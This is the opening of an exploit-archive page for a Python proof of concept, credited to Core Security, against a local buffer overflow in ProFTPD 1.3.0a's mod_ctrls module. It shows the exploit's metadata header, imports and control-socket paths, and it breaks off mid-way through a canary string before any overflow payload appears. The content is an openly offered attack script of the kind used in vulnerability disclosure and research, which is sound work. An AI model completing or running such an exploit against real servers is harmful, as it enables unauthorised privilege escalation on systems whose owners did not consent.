[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
# Published : 2006-12-13
# Author : Core Security
# Previous Title : Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit
# Next Title : Microsoft Word Document (malformed pointer) Proof of Concept
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow
import socket
import os, os.path,stat
#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "